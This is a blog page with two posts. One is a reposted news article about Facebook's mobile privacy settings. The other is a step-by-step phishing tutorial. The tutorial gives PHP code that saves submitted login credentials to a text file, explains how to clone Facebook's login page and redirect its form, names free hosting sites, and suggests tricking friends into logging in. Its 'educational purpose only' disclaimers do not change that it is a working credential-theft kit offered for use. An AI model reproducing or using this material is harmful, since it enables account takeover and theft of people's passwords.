Showing posts with label facebook hacks. Show all posts
Showing posts with label facebook hacks. Show all posts

Sunday, September 9, 2012

Facebook privacy settings finally go mobile

By Amy Gahran, Special to CNN


In response to user complaints about its privacy settings, Facebook in October debuted its privacy dashboard. But you could only use it from a computer.
This week, Facebook has made it easier for users to check and change their privacy settings from mobile devices, too.
In a December 8 blog post, Facebook product manager Rose Yao explained: "Now you can see a detailed view of the information you've shared with various applications and websites and adjust your settings on the go. A full list of all the applications you use, along with when they last accessed your information, is now available in the Applications and Websites section of your privacy settings."
This is an expansion of the mobile privacy controls Facebook rolled out this August, which apparently didn't give users quite as much control over privacy for specific Facebook applications as the updated mobile privacy controls do.
So far, this privacy control upgrade seems to be available only via theFacebook mobile web site and not through the popular Facebook smartphone apps. I just checked the Facebook app for Android and could not access my privacy settings there.
Hopefully later Facebook will roll out this feature to its smartphone apps, as it did for Facebook Places. Improving users' mobile access to their privacy settings is pretty important, since last month Facebook rolled out a single mobile sign-on for applications.
Inside Facebook's Josh Constine explained: "Apps which integrate with Facebook on iPhone and Android will query the Facebook for iPhone or Facebook for Android app to check to make sure a user is signed in. If they are, users simply need to click 'login' in the app to access it.
If they are logged out of Facebook via their phone's native app, they'll be prompted to log in to Facebook, but won't be making an app-specific Facebook login."
For example, "A big barrier to trying a Groupon is not wanting to sign-in or sign-up. Now users can quickly sign-in through Facebook and instantly buy a Groupon," wrote Constine.
Given that social media is one of the most popular things people do on their cell phones (both smartphones and web-enabled feature phones), it's important to be able to access and control your privacy settings wherever you are -- especially since Facebook is getting more integrated with other mobile apps.
Often the tradeoff for digital convenience is privacy. If privacy matters to you, it pays to know how to monitor and control your privacy as much as possible.

Saturday, July 14, 2012

Learn How Hackers Hack your Facebook Account using Phishing Page

Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.
This is to aware you that many bad guys using this trick to Hack you facebook account and to steal your username and password. So whenever you click any link provided by any personBeware.......Think Before you Click!!
  • Always look at your address bar n see the address to know that you are actually seeing the site is genuine site or not.....

Some bad guys actual use phising n create fake pages to hack your facebook or any other account.

For this We need three files:
1.Fake facebook login page
2.Php file
3.Text file to store password

Create your php file
1.Open notepad and copy this code:
header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
2.Now save this as phishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Create facebook fake login page
Now  go to http://www.facebook.com%20and/ right click / View Source.Copy source in notepad and save it as facebooklogin .html . and

Now open source code of this html file
We need to find the place where Login  code in facebook page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code 

action=anything.
In this case we have this

action=”https://login.facebook.com/login.php?
We replace that part with:
action=”phishing.php
Save your facebooklogin.html file
Text file
Create a blank text file and name it password.txt
Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake facebook login page by going to http://yoursite.110mb.com/Facebooklogin.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
You can use
http://www.justfree.com/
http://www.ripway.com/
also or any other free hosting site.
Suppose you register with name facebookhack.Your link will behttp://www.facebookhack.justfree.com/
After uploading files your phishing link will behttp://www.facebookhack.justfree.com/facebooklogin.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like

“This Article is made Only to Aware you about fake pages,  Use this on your own responsibility for educational purpose only .